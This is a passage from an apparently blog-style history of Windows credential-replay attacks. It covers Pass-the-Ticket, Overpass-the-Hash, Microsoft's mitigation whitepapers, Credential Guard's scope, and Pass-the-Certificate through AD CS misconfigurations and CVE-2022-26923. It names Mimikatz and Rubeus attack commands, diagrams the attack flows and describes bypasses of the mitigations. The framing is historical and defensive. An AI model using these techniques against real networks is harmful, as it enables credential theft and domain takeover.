The long-lived Kerberos credential issued by the KDC&apos;s Authentication Service (AS-REP) in response to a successful AS-REQ. The TGT is encrypted under the KDC&apos;s own krbtgt-account long-term key and contains a session key that the client uses to subsequently request service tickets from the Ticket Granting Service (TGS). Specification: RFC 4120, section 3 [@rfc-4120]. On a Windows Active Directory deployment the default TGT lifetime is 10 hours with renewal up to 7 days.

The technique of extracting a Kerberos TGT (and its session key) from one machine&apos;s LSASS-resident Kerberos cache and injecting it into another machine&apos;s cache, so that subsequent service-ticket requests authenticate as the ticket&apos;s original principal. Tool of record: Mimikatz `sekurlsa::tickets` + `kerberos::ptt`; equivalent functionality in Rubeus and Impacket.

sequenceDiagram
    participant Victim as Victim host
    participant Attacker as Attacker host
    participant KDC
    Note over Victim: User logged in, TGT cached in LSASS Kerberos package
    Attacker-&amp;gt;&amp;gt;Victim: mimikatz sekurlsa::tickets export
    Victim--&amp;gt;&amp;gt;Attacker: TGT.kirbi (ticket plus session key)
    Note over Attacker: mimikatz kerberos::ptt TGT.kirbi
    Attacker-&amp;gt;&amp;gt;KDC: TGS-REQ presenting injected TGT
    KDC--&amp;gt;&amp;gt;Attacker: TGS-REP service ticket
    Attacker-&amp;gt;&amp;gt;Attacker: Authenticate to any Kerberos service as the victim
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A common shorthand says that Microsoft&apos;s Credential Guard isolated NT hashes, so attackers shifted to TGTs. That arrow runs backwards in time. Pass-the-Ticket predates Credential Guard by years -- the Mimikatz Kerberos primitives developed between the May 2011 closed-source release and the April 6, 2014 open-source commit (the earliest verifiable source-level evidence for &lt;code&gt;sekurlsa::tickets&lt;/code&gt; and &lt;code&gt;kerberos::ptt&lt;/code&gt;), and were presented in detail at Black Hat USA 2014 by Duckwall and Delpy [@infocondb-bh2014-duckwall] [@duckwall-delpy-bh2014-wp]. Pass-the-Ticket exists because TGTs are also in LSASS, not as a defensive response. The shift to a new artefact happened because the &lt;em&gt;architectural property&lt;/em&gt; of credential extraction generalised, not because Credential Guard pushed attackers there.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The third generation followed shortly. &lt;strong&gt;Overpass-the-Hash&lt;/strong&gt; observes that for the RC4-HMAC Kerberos encryption type -- the Windows default from Windows 2000 through November 2022 -- the user&apos;s long-term Kerberos key is the unchanged NT hash.&lt;/p&gt;
&lt;p&gt;RFC 4757, authored by K. Jaganathan, L. Zhu, and J. Brezak of Microsoft and published as informational in December 2006, specifies the RC4-HMAC enctype&apos;s long-term key as the existing NT hash without modification [@rfc-4757]. An attacker who holds the NT hash can drive a legitimate Kerberos AS-REQ to the KDC, encrypt the timestamp pre-auth blob with the NT hash as the RC4-HMAC key, and receive a real TGT signed by the real krbtgt.&lt;/p&gt;
&lt;p&gt;The economic effect is large. Pass-the-Hash gets you NTLM-based services -- SMB, RPC, and any protocol over them. Overpass-the-Hash gets you the entire Kerberos surface: Kerberos-only services, services that require Kerberos for delegation, services with NTLM disabled at the GPO level. Same NT hash. Different downstream protocol. Strictly larger attack surface.&lt;/p&gt;

The technique of presenting a stolen NT hash to the KDC as the user&apos;s long-term RC4-HMAC Kerberos key (per RFC 4757 [@rfc-4757]), obtaining a real TGT signed by the real krbtgt, and operating as a real Kerberos client for the ticket&apos;s lifetime. Tool of record: Mimikatz `sekurlsa::pth /user: /domain: /ntlm: /run:` and Rubeus `asktgt /user: /rc4:`. Per Sean Metcalf&apos;s adsecurity.org reference, the technique is named &quot;over&quot; because the hash is promoted one notch up the protocol stack from NTLM into Kerberos [@adsec-mimikatz-p556] [@adsec-kerberos-p2293].

sequenceDiagram
    participant Attacker
    participant KDC
    participant Service as Kerberos service
    Note over Attacker: Holds NT hash for user (e.g. from sekurlsa::logonpasswords)
    Attacker-&amp;gt;&amp;gt;KDC: AS-REQ with PA-ENC-TIMESTAMP encrypted under RC4-HMAC(NT hash)
    KDC-&amp;gt;&amp;gt;KDC: Verify PA-ENC-TIMESTAMP decrypts cleanly
    KDC--&amp;gt;&amp;gt;Attacker: AS-REP with real TGT signed by krbtgt
    Attacker-&amp;gt;&amp;gt;KDC: TGS-REQ for Service
    KDC--&amp;gt;&amp;gt;Attacker: TGS-REP service ticket
    Attacker-&amp;gt;&amp;gt;Service: AP-REQ authenticate as user
    Service--&amp;gt;&amp;gt;Attacker: Access granted
&lt;p&gt;The naming has its own story. The Mimikatz capability is Delpy&apos;s; the term &quot;Overpass-the-Hash&quot; and the taxonomic framing that distinguishes it from straight Pass-the-Hash spread through the practitioner community via Sean Metcalf&apos;s adsecurity.org reference [@adsec-mimikatz-p556] and the Duckwall + Delpy Black Hat USA 2014 talk and whitepaper [@infocondb-bh2014-duckwall] [@duckwall-delpy-bh2014-wp]. The earliest archived snapshot of the adsecurity.org reference is October 1, 2014; the talk timestamp is August 7, 2014. The two sources are essentially contemporaneous, and Metcalf&apos;s later &quot;Red vs. Blue&quot; Black Hat USA 2015 whitepaper consolidates the practitioner taxonomy [@metcalf-bh2015-red-vs-blue].&lt;/p&gt;
&lt;p&gt;The &quot;Overpass&quot; coinage is a deliberate semantic argument that the technique is one notch &lt;em&gt;above&lt;/em&gt; Pass-the-Hash on the protocol stack: the NT hash, which began life as an NTLM response key, is being promoted into Kerberos as a long-term encryption key. The naming credit is socially distributed -- Metcalf, Delpy, Duckwall, and Mimikatz&apos;s own command group all carry traces of it -- so this article uses Metcalf&apos;s reference as the canonical practitioner explainer rather than as a single inventor citation.&lt;/p&gt;
&lt;p&gt;The DigiNotar incident in September 2011 is the first publicly attributed criminal use of Mimikatz, four months after Delpy&apos;s first public release. The Dutch certificate authority DigiNotar -- founded 1998, acquired by VASCO in January 2011, hacked in June 2011, declared bankrupt in September 2011 [@wikipedia-diginotar] -- was used to issue hundreds of fraudulent certificates that were then used in man-in-the-middle attacks on Iranian Gmail users [@wikipedia-diginotar] [@fox-it-operation-black-tulip].&lt;/p&gt;
&lt;p&gt;Greenberg&apos;s Wired profile records that Delpy was told by the breach investigators that Mimikatz had been used during the intrusion [@wired-greenberg-mimikatz]. The single-source attribution warrants a hedge -- Greenberg&apos;s source is Delpy himself, quoting investigators -- but the underlying breach timeline is solid.&lt;/p&gt;

The decision to open-source Mimikatz on April 6, 2014 is dated by the GitHub repository banner: `mimikatz 2.0 alpha (x86) release &quot;Kiwi en C&quot; (Apr  6 2014 22:02:03)` [@mimikatz-github]. The precipitating event, as Delpy told Wired, was a trip to Moscow: he returned to his hotel room to find a stranger at his laptop; a second man approached him in the lobby that evening and demanded source code on a USB stick. He decided defenders needed the source as much as the attackers already did, and pushed it to GitHub when he got home [@wired-greenberg-mimikatz].
&lt;p&gt;By 2014, the credential-replay family had three generations -- Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash -- and Microsoft&apos;s only documented response was a forty-page PDF. The next section is what that PDF said, and why documentation alone cannot end an attack class.&lt;/p&gt;
&lt;h2&gt;5. Documentation Is Not Defense&lt;/h2&gt;
&lt;p&gt;By December 2012, Microsoft had a problem. Duckwall and Campbell had just shipped a Black Hat USA paper titled &quot;Still Passing the Hash 15 Years Later&quot; [@duckwall-campbell-bh2012]. Mimikatz was eighteen months old. The institutional position that Pass-the-Hash was a &quot;post-compromise issue&quot; -- the line Microsoft had held since 1997 -- was no longer survivable in public.&lt;/p&gt;
&lt;p&gt;The institutional response came in two waves. &lt;em&gt;Mitigating Pass-the-Hash Attacks and Other Credential Theft&lt;/em&gt;, version 1, shipped in late 2012 (most practitioner secondaries place it in December 2012; no primary Microsoft URL with a verifiable v1 timestamp survives today).&lt;/p&gt;
&lt;p&gt;Version 2 followed in July 2014, extending the v1 playbook with the new defensive surfaces that shipped in Windows 8.1 and Windows Server 2012 R2: &lt;a href=&quot;https://paragmali.com/blog/who-is-allowed-to-log-in-where-the-kdc-side-answer-to-creden/&quot; rel=&quot;noopener&quot;&gt;Protected Users&lt;/a&gt; as a deployable security group, Restricted Admin RDP as a default-available feature, LSA Protection (RunAsPPL) as a registry-toggleable defense, and Authentication Policies and Silos as KDC-side restrictions [@ms-download-mitigating-pth-v2]. The two whitepapers are the closest thing the industry got to an institutional Microsoft acknowledgment that Pass-the-Hash was a load-bearing operational problem requiring a defensive playbook rather than a patch.&lt;/p&gt;
&lt;p&gt;What did the playbook recommend? Three orthogonal stopgaps, each with a published bypass.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Protected Users&lt;/strong&gt; (Windows Server 2012 R2). A security group whose membership bans, on the DC side, NTLM authentication, DES and RC4 Kerberos pre-authentication, and Kerberos unconstrained delegation; and, on the device side, NTLM caching of the user&apos;s plaintext credentials or NTOWF and Kerberos DES/RC4 long-term keys. Member TGTs are capped at 240 minutes (four hours) with no renewal [@ms-protected-users]. Documented bypasses: requires explicit opt-in per account, breaks any service that depended on unconstrained delegation, does not apply to computer accounts or service accounts by default, and has no effect on Kerberos AES-key extraction from LSASS (since AES keys are not banned; only RC4 is).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Restricted Admin RDP&lt;/strong&gt; (introduced in Windows 8.1 / Server 2012 R2 RTM, October 2013; backported to Windows 7 / Server 2008 R2 / Windows 8 / Server 2012 by KB2871997 on May 13, 2014 [@ms-kb2871997-may2014]). An opt-in RDP mode that authenticates to the target without sending credentials, so a compromised target cannot harvest the RDP user&apos;s hash from its own LSASS. Documented bypass: opt-in per session, applies only to RDP, leaves SMB, WMI, and RPC unprotected. And it &lt;em&gt;enables&lt;/em&gt; Pass-the-Hash for RDP -- the BloodHound &lt;code&gt;CanRDP&lt;/code&gt; edge documents the abuse path with the exact Mimikatz command for injecting a stolen NT hash into &lt;code&gt;mstsc.exe /restrictedadmin&lt;/code&gt; [@bloodhound-canrdp].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;LSA Protection / RunAsPPL&lt;/strong&gt; (Windows 8.1). A registry toggle that marks LSASS as a &lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Protected Process Light&lt;/a&gt;, so non-PPL processes (including unsigned admin tools) cannot open it with &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;. Documented bypass: any signed kernel driver -- including loadable third-party drivers -- can still read PPL memory, and an attacker with local admin can load such a driver. The itm4n analysis includes the verbatim Mimikatz output where &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; returns access-denied against a PPL-marked LSASS, and shows that an attacker who loads a signed driver via the BYOVD pattern (&quot;bring your own vulnerable driver&quot;) or escalates to kernel mode bypasses the marking. itm4n&apos;s framing -- &quot;Credential Guard and LSA Protection are actually complementary&quot; [@itm4n-lsass-runasppl] -- is also the prediction: PPL is part of the answer, but only when paired with the architectural pivot still to come.&lt;/p&gt;

A Windows Server 2012 R2 security group whose membership applies a set of restrictions, enforced jointly by the device and the domain controller, that block the most commonly extracted long-term credential material: no NTLM, no Kerberos RC4 or DES pre-auth, no unconstrained delegation, no NT-hash caching, and a 240-minute TGT lifetime with no renewal [@ms-protected-users].
&lt;p&gt;The structural point is this. Documentation tells administrators &lt;em&gt;what to do&lt;/em&gt;. It does not prevent the underlying LSASS-resident credential extraction. Every defense documented in v1 and v2 of the Mitigating-PtH whitepapers is bypassable, with a known and published technique, on any system where the attacker already has local administrator -- and local administrator is exactly what Pass-the-Hash exploitation &lt;em&gt;already implies&lt;/em&gt;. The defender&apos;s win condition is to keep the attacker from ever getting to local admin in the first place; once they have it, every documented mitigation is a speed bump rather than a wall.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The 2012-2014 era&apos;s load-bearing failure mode was assuming that telling administrators where credentials &lt;em&gt;should&lt;/em&gt; live would prevent extraction from where they &lt;em&gt;do&lt;/em&gt; live. Protected Users, Restricted Admin RDP, RunAsPPL, and Authentication Silos are all useful, and stacked together they raise the cost of post-admin exploitation. None of them moves the credential out of the address space the attacker can read.&lt;/p&gt;
&lt;/blockquote&gt;

A common secondary characterisation cites a &quot;v3 2017&quot; of the whitepaper alongside v1 and v2. That document does not exist in Microsoft Download Center ID 36036; the page lists Version 2.0; the 2023 Wayback snapshot of the same Download Center page records Date Published 7/7/2014, while the live page now shows a 2024 republication date for the same Version 2.0 PDF without a version bump [@ms-download-mitigating-pth-v2]. The Download Center page carries v2 metadata only -- v1&apos;s late-2012 date is sourced through contemporary practitioner literature rather than a primary Microsoft timestamp. After 2014 the post-v2 institutional documentation moves to the Microsoft Learn Credential Guard page rather than to a third whitepaper revision -- a structural choice, because by 2015 the architectural answer has shifted from prose to code.
&lt;p&gt;By mid-2014 Microsoft&apos;s institutional position was that the protocol-level fix was unavailable and the architectural answer would need to &lt;em&gt;relocate the credentials&lt;/em&gt;. If credentials cannot stay in LSASS where every admin process can read them, the credentials have to be moved to a place admin processes cannot read. That insight produces Credential Guard.&lt;/p&gt;
&lt;h2&gt;6. Credential Guard and the Architectural Pivot&lt;/h2&gt;
&lt;p&gt;On July 29, 2015, Microsoft shipped Windows 10 Enterprise [@ms-lifecycle-w10-enterprise]. Hidden in the RTM build was the first defense in the credential-replay lineage that wasn&apos;t documentation: hardware-rooted isolation. They called it Credential Guard.&lt;/p&gt;
&lt;p&gt;The architecture is worth unpacking carefully, because every later generation of the family is best read as &quot;what does this attack do to the assumptions Credential Guard makes?&quot;&lt;/p&gt;
&lt;p&gt;Credential Guard runs on top of Virtualization-Based Security. The Windows hypervisor partitions user mode into two virtual trust levels. VTL0 is the normal user partition: normal user-mode processes, including the normal LSASS, and the normal kernel. VTL1 is the isolated user partition: a small set of &lt;em&gt;trustlets&lt;/em&gt;, signed user-mode processes the hypervisor protects from VTL0 inspection. Credential Guard&apos;s trustlet is LSAISO (&quot;LSA Isolated&quot;), a stripped-down clone of the LSA credential cache holding the material Microsoft wants out of VTL0. Hypervisor-enforced Code Integrity (HVCI) below enforces W^X on the VTL0 kernel, blocking kernel-mode bypasses that would otherwise read VTL1 memory directly.&lt;/p&gt;

The Windows architecture that runs a Type-1 hypervisor below the normal Windows kernel and partitions user mode into VTL0 (the normal partition) and VTL1 (the isolated partition). VTL1 hosts trustlets that the hypervisor protects from VTL0 inspection, even from kernel-mode VTL0 code. VBS is the substrate for Credential Guard, HVCI, the System Guard secure-launch chain, and the secure kernel.

The Windows feature that relocates NT hashes, Kerberos TGT session keys, and &quot;credentials stored by applications as domain credentials&quot; from the in-VTL0 LSASS to the in-VTL1 LSAISO trustlet, so that the credential cache is unreadable from any VTL0 process or driver. Shipped in Windows 10 RTM (July 2015); default-enabled on hardware-eligible domain-joined non-DC systems in Windows 11 22H2 (September 2022) [@ms-learn-credential-guard].

The isolated-user-mode LSA process (`lsaiso.exe`) that holds Credential Guard&apos;s protected credential material. Runs in VTL1, unreadable from VTL0 kernel or user processes. Communicates with the VTL0 LSASS through a small RPC surface for authorised authentication operations only.
&lt;p&gt;What does Credential Guard isolate? The Microsoft Learn page is unambiguous: &quot;Credential Guard prevents credential theft attacks by protecting NTLM password hashes, Kerberos Ticket Granting Tickets (TGTs), and credentials stored by applications as domain credentials.&quot; [@ms-learn-credential-guard] Those three categories are also the three categories the previous three generations of the family targeted. Pass-the-Hash hits NTLM password hashes. Pass-the-Ticket hits Kerberos TGTs. Overpass-the-Hash hits NTLM password hashes promoted into Kerberos. Credential Guard moves all three out of VTL0 LSASS into VTL1 LSAISO. On a hardware-eligible domain-joined Windows 10/11 system with Credential Guard enabled, all three attacks return empty buffers.&lt;/p&gt;
&lt;p&gt;The institutional importance of the change is that under Microsoft&apos;s own &lt;em&gt;Windows Security Servicing Criteria&lt;/em&gt;, Credential Guard is a &lt;em&gt;security boundary&lt;/em&gt; -- which means a bypass is a CVE-class vulnerability rather than a documentation gap.&lt;/p&gt;
&lt;p&gt;The criteria&apos;s load-bearing definitions: &quot;A security boundary provides a logical separation between the code and data of security domains with different levels of trust&quot; and &quot;Does the vulnerability violate the goal or intent of a security boundary or a security feature?&quot; [@msrc-windows-servicing-criteria] Pre-2015 Pass-the-Hash defenses were documentation; Credential Guard is the first defense the criteria treats as CVE-class under the boundary &quot;admin -&amp;gt; VBS (LSAISO trustlet).&quot;&lt;/p&gt;

flowchart TD
    subgraph VTL0[VTL0 normal partition]
        A[User processes]
        B[LSASS]
        K[VTL0 kernel]
    end
    subgraph VTL1[VTL1 isolated partition]
        L[LSAISO trustlet]
        SK[Secure kernel]
    end
    H[Hypervisor]
    A --&amp;gt; B
    K --&amp;gt; B
    B -- authorised RPC only --&amp;gt; L
    H --&amp;gt; VTL0
    H --&amp;gt; VTL1
    SK --&amp;gt; L
    K -. blocked by HVCI .-&amp;gt; L
&lt;p&gt;What does Credential Guard &lt;em&gt;not&lt;/em&gt; isolate? This is the load-bearing question for the rest of the article. The same Microsoft Learn page enumerates four caveats, each verbatim.&lt;/p&gt;
&lt;p&gt;First, the Active Directory database and the SAM. &quot;Credential Guard doesn&apos;t provide protections for the Active Directory database or the Security Accounts Manager (SAM).&quot; [@ms-learn-credential-guard] This is the &lt;a href=&quot;https://paragmali.com/blog/two-checkmarks-and-the-keys-to-the-kingdom-how-active-direct/&quot; rel=&quot;noopener&quot;&gt;DCSync&lt;/a&gt; gap: an attacker with the right replication privileges can ask a DC to hand over every hash in the directory, and Credential Guard cannot intervene because the data is being released through a legitimate, authorised API rather than being read from LSASS.&lt;/p&gt;
&lt;p&gt;Second, domain controllers. &quot;Enabling Credential Guard on domain controllers isn&apos;t recommended. Credential Guard doesn&apos;t provide any added security to domain controllers.&quot; [@ms-learn-credential-guard] The KDC must read the krbtgt account&apos;s long-term key in cleartext to issue tickets; the architectural exception is intrinsic to Kerberos rather than a Microsoft oversight.&lt;/p&gt;
&lt;p&gt;Third, application credentials outside the &quot;domain credentials&quot; scope. Certificate private keys held by CryptoAPI key containers, third-party authentication package secrets, and -- the one this article eventually argues is the most consequential -- the Primary Refresh Token material held by the CloudAP authentication plug-in, are all out of scope by construction.&lt;/p&gt;
&lt;p&gt;Fourth, and most importantly, the institutional acknowledgment of the supersession pattern. Microsoft Learn reproduces it verbatim on the same page, the prophecy the rest of this article spends its time documenting being fulfilled:&lt;/p&gt;

While Credential Guard is a powerful mitigation, persistent threat attacks will likely shift to new attack techniques, and you should also incorporate other security strategies and architectures. -- Microsoft Learn, *Credential Guard overview* [@ms-learn-credential-guard]
&lt;p&gt;That sentence, written about the 2015 Credential Guard architecture, accurately predicts the 2021-2022 shift to Pass-the-Certificate and the 2020-present shift to Pass-the-PRT. It is Microsoft&apos;s own structural prediction that the family will continue to evolve to the next artefact Credential Guard&apos;s verbatim scope does not cover. The rest of this article reads as the unfolding of that prediction.&lt;/p&gt;

The Kerberos KDC must read the krbtgt account&apos;s long-term key to encrypt the TGT issued in every AS-REP. That key has to be available to the LSA process in cleartext, on every DC, on every ticket issuance, by protocol. Putting krbtgt behind LSAISO would mean issuing every TGT through an inter-trust-level RPC call -- a non-trivial performance penalty on every authentication in an Active Directory forest -- and would not actually close the architectural gap, because the trustlet itself would still need to do the cleartext work that LSASS does today. The exception is honest about an architectural reality rather than concealing it.
&lt;p&gt;PPL and Credential Guard are &lt;em&gt;complementary&lt;/em&gt;, not alternatives. itm4n&apos;s analysis [@itm4n-lsass-runasppl] makes the case carefully: RunAsPPL raises the bar from &quot;any admin process can read LSASS&quot; to &quot;any signed driver can read LSASS,&quot; and Credential Guard closes the signed-driver bypass with hardware-rooted hypervisor isolation. They stack. The 2026 best-practice Windows endpoint has both turned on.&lt;/p&gt;
&lt;p&gt;The default-enablement window shows how long this took to land. Credential Guard shipped enabled-by-policy in Windows 10 RTM in 2015, but did not become &lt;em&gt;default-enabled on hardware-eligible domain-joined non-DC systems&lt;/em&gt; until Windows 11 22H2 in September 2022 [@ms-learn-credential-guard]. Seven years of uneven deployment.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Four residuals from the Microsoft Learn page: the Active Directory database and the SAM are out of scope; domain controllers are out of scope by recommendation; application credentials outside the &quot;domain credentials&quot; category (certificates, CloudAP material, third-party authentication packages) are out of scope by construction; and persistent threats are &lt;em&gt;expected&lt;/em&gt; to shift to new attack techniques. Each residual maps to a later generation of this article: AD database -&amp;gt; DCSync; certificates -&amp;gt; Pass-the-Certificate; CloudAP -&amp;gt; Pass-the-PRT.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Each new credential type needs its own isolation boundary. Credential Guard isolates NT hashes and TGT session keys. It does not isolate certificate private keys, because in 2015 nobody was replaying certificates at scale. And it does not isolate the Primary Refresh Token, because in 2015 the Primary Refresh Token did not yet exist.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Each new credential type needs its own isolation boundary. The pattern is reusable but does not transfer automatically -- and the gap between &quot;what fits in the boundary&quot; and &quot;what credentials Windows actually uses&quot; is exactly the territory where the next attack generation grows.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;7. Pass-the-Certificate: The Predictable Response&lt;/h2&gt;
&lt;p&gt;If the NT hash is isolated and RC4-HMAC is banned, what is the next long-term credential Windows accepts? The answer was hiding in plain sight: every Active-Directory-integrated enterprise had been running Microsoft&apos;s PKI since 2008, and almost every PKI deployment had at least one template-level catastrophe.&lt;/p&gt;
&lt;p&gt;On June 17, 2021, Will Schroeder and Lee Christensen posted &quot;Certified Pre-Owned&quot; on Medium, with the accompanying 143-page whitepaper [@specterops-certified-pre-owned] [@specterops-certified-pre-owned-pdf]. The post named ESC1 through ESC8 in a single document, with paired DETECT and PREVENT recommendations, and shipped three pieces of tooling at the same Black Hat USA 2021 cycle: Certify (offensive enrollment), ForgeCert (golden-certificate forging using a stolen CA private key), and PSPKIAudit (defensive enumeration). The Medium post&apos;s tone was unsubtle:&lt;/p&gt;

Of note, nearly every environment with AD CS that we&apos;ve examined for domain escalation misconfigurations has been vulnerable. It&apos;s hard for us to overstate what a big deal these issues are. -- Will Schroeder and Lee Christensen, *Certified Pre-Owned* [@specterops-certified-pre-owned]
&lt;p&gt;The &lt;a href=&quot;https://paragmali.com/blog/certified-pre-owned-ad-cs-and-active-directorys-second-trust/&quot; rel=&quot;noopener&quot;&gt;ESC catalog&lt;/a&gt; organises certificate misconfigurations by the abuse primitive they enable. ESC1 is the canonical example: a published certificate template that allows the enrollee to supply the Subject Alternative Name, contains a client-authentication Extended Key Usage, has permissive enrollment rights, and has no effective approval gates.&lt;/p&gt;
&lt;p&gt;An attacker who can enroll for such a template requests a certificate naming a victim principal -- say, the domain administrator -- in the SAN. The certificate&apos;s private key is now the attacker&apos;s. PKINIT-authenticate to the KDC with that certificate, and the KDC issues a TGT for the named principal. Domain escalation, in three commands.&lt;/p&gt;

Microsoft&apos;s enterprise PKI. Issues X.509 certificates from administrator-defined templates that pin a certificate&apos;s permitted uses (Extended Key Usages), its enrollment authorisation rules, its subject and SAN generation policy, and its revocation behaviour. Ships as a Windows Server role; deployed in essentially every Active-Directory-integrated enterprise.

Kerberos pre-authentication using a certificate&apos;s private key in place of a long-term symmetric key. Specified by RFC 4556 (L. Zhu and B. Tung, Microsoft and Aerospace, June 2006) [@rfc-4556]. The certificate&apos;s UPN SAN (or its dNSHostName for computer accounts) maps the certificate to the principal whose TGT the KDC will issue. PKINIT is the protocol surface most commonly exercised by Pass-the-Certificate against domain controllers that support certificate-based authentication.

The Windows TLS implementation. Supports TLS client-certificate authentication, which authenticated LDAPS uses. When a domain controller does not support PKINIT (Schroeder + Christensen documented this case in the original catalog; AlmondOffSec built tooling for it), an attacker can authenticate to LDAPS over Schannel with a stolen client certificate and perform high-privilege LDAP operations without traversing the KDC.

The technique of authenticating to Active Directory with a stolen X.509 certificate&apos;s private key, via PKINIT to the KDC or via Schannel client-certificate authentication to LDAPS. Named in this form by Yannick Méheut&apos;s PassTheCert tool and blog post (May 2022) [@almondoffsec-passthecert-github] [@almondoffsec-passthecert-blog], though the technique class was catalogued by Schroeder and Christensen eleven months earlier [@specterops-certified-pre-owned]. Tool of record: Certify (C#), Certipy (Python, ESC1-ESC16 [@certipy-wiki-privesc]), and Rubeus PKINIT mode.

sequenceDiagram
    participant Atk as Attacker (user)
    participant CA as Enterprise CA
    participant KDC
    Atk-&amp;gt;&amp;gt;CA: Enrol for template ESC1, SAN field set to Domain Administrator
    CA--&amp;gt;&amp;gt;Atk: X.509 certificate plus private key
    Note over Atk: Now holds a certificate naming the victim principal
    Atk-&amp;gt;&amp;gt;KDC: AS-REQ with PKINIT pre-auth using the stolen private key
    KDC-&amp;gt;&amp;gt;KDC: Validate certificate, map SAN to victim principal
    KDC--&amp;gt;&amp;gt;Atk: AS-REP with TGT for victim principal
    Atk-&amp;gt;&amp;gt;KDC: TGS-REQ for any service
    KDC--&amp;gt;&amp;gt;Atk: TGS-REP service ticket
&lt;p&gt;The CVE-class case lands on May 10, 2022. Oliver Lyak of IFCR discloses Certifried, CVE-2022-26923, an Active Directory Domain Services elevation-of-privilege vulnerability in which the combination of three Microsoft defaults -- &lt;code&gt;ms-DS-MachineAccountQuota = 10&lt;/code&gt; (any authenticated user can add up to 10 computer accounts to the domain), the default Machine template (which a computer account can enroll for), and the KDC&apos;s permissive &lt;code&gt;dNSHostName&lt;/code&gt;-to-SAN binding logic -- lets any authenticated user obtain a certificate for any computer account in the forest, including domain controllers.&lt;/p&gt;
&lt;p&gt;PKINIT-authenticate as a domain controller, and the KDC issues you a TGT for the DC; from there, DCSync extracts the krbtgt key and the domain is yours. Domain escalation from any authenticated user, with the only required misconfiguration being &lt;em&gt;Microsoft&apos;s defaults&lt;/em&gt; [@nvd-cve-2022-26923] [@semperis-cve-2022-26923].&lt;/p&gt;
&lt;p&gt;The defensive response shipped the same day. Microsoft published KB5014754 on May 10, 2022 -- coordinated disclosure, with the patch shipping in the same window as the CVE -- introducing a new X.509 extension &lt;code&gt;szOID_NTDS_CA_SECURITY_EXT&lt;/code&gt; (OID &lt;code&gt;1.3.6.1.4.1.311.25.2&lt;/code&gt;) that carries the requesting principal&apos;s SID at certificate issuance.&lt;/p&gt;
&lt;p&gt;The KDC&apos;s new strong-mapping logic refuses certificates that fail one of four conditions: the SID extension is present and matches; an issuer-serial mapping is present; a Subject Key Identifier mapping is present; or a SHA1-public-key mapping is present. The KB&apos;s load-bearing sentence: &quot;In Full Enforcement mode, if a certificate fails the strong (secure) mapping criteria (see Certificate mappings), authentication will be denied.&quot; [@ms-kb5014754]&lt;/p&gt;
&lt;p&gt;The KB5014754 change-log preserves a forensic artefact of the coordinated-disclosure timeline that is easy to miss. The current change-log row reads, verbatim: &quot;9/10/2025 - Corrected the Enforcement mode date from September 10, 2025, to September 9, 2025.&quot; [@ms-kb5014754] An off-by-one date correction, captured in the public KB. The kind of detail that only shows up when a small team has had to ship a date repeatedly against a multi-year audit-to-enforcement schedule.&lt;/p&gt;
&lt;p&gt;The enforcement timeline tells you how long even a CVE-class fix took to drive through deployment. Audit mode (May 10, 2022). Enforcement mode with a registry escape that admins could use to revert to compatibility (February 11, 2025). Final cutover with no escape (September 9, 2025) [@ms-kb5014754]. Three years and four months between the patch and the day Microsoft stopped accepting non-strong certificate mappings. Faster than the Credential Guard default-enablement window, but still measured in years.&lt;/p&gt;
&lt;p&gt;The naming history deserves a disambiguation. The &lt;em&gt;catalog&lt;/em&gt; -- ESC1 through ESC8, the full taxonomy of AD CS misconfigurations -- is Schroeder and Christensen, June 2021 [@specterops-certified-pre-owned]. The &lt;em&gt;wire-level technique name&lt;/em&gt; &quot;Pass-the-Certificate&quot; is popularised by AlmondOffSec&apos;s PassTheCert PoC (Yannick Méheut, May 4, 2022), which targets LDAP/S via Schannel client-cert authentication when PKINIT is unavailable, as a fallback path for environments where domain controllers do not support certificate-based Kerberos pre-authentication [@almondoffsec-passthecert-github] [@almondoffsec-passthecert-blog]. The blog post documents the &lt;code&gt;KDC_ERR_PADATA_TYPE_NOSUPP&lt;/code&gt; error path that diverts the PKINIT-blocked attacker into Schannel.&lt;/p&gt;
&lt;p&gt;The AlmondOffSec blog post acknowledges the social attribution of the term: &quot;Note for Googlers: this tool extends the notion of Pass the Certificate, thus dubbed by @_nwodtuhs in his Twitter thread on AD CS and PKINIT.&quot; [@almondoffsec-passthecert-blog] The technique name is socially attributed; the catalog framing is editorial.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A common shorthand says that KB5014754 bound NTOWFs to Kerberos, and that this is what forced attackers to shift to certificates. That arrow runs backwards in time. KB5014754 is the &lt;em&gt;response&lt;/em&gt; to Certifried, not the cause of Pass-the-Certificate. The technique class was catalogued by Schroeder and Christensen in June 2021, eleven months before KB5014754 shipped, and the PassTheCert tool that gave the technique its wire-level name appeared six days before Certifried&apos;s disclosure. The shift to certificates happened because certificates were the next long-term credential type Credential Guard did not isolate.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What does KB5014754 actually close? Three specific CVEs in the Certifried family: CVE-2022-26923 (the original SID-spoof Certifried disclosure), CVE-2022-26931 (UPN / sAMAccountName collision spoof), and CVE-2022-34691 (the certificate-pre-dating-account-creation case) [@ms-kb5014754]. What does it &lt;em&gt;not&lt;/em&gt; close? The broader ESC2 through ESC8 catalog, which is administrative hardening rather than CVE-class control. And it does not close ESC9 through ESC16, which were enumerated &lt;em&gt;after&lt;/em&gt; KB5014754 shipped and include cases like the &lt;code&gt;CT_FLAG_NO_SECURITY_EXTENSION&lt;/code&gt; template flag that &lt;em&gt;exempts&lt;/em&gt; a template from the very SID extension the patch introduced [@specterops-certs-patches-2022] [@certipy-wiki-privesc].&lt;/p&gt;
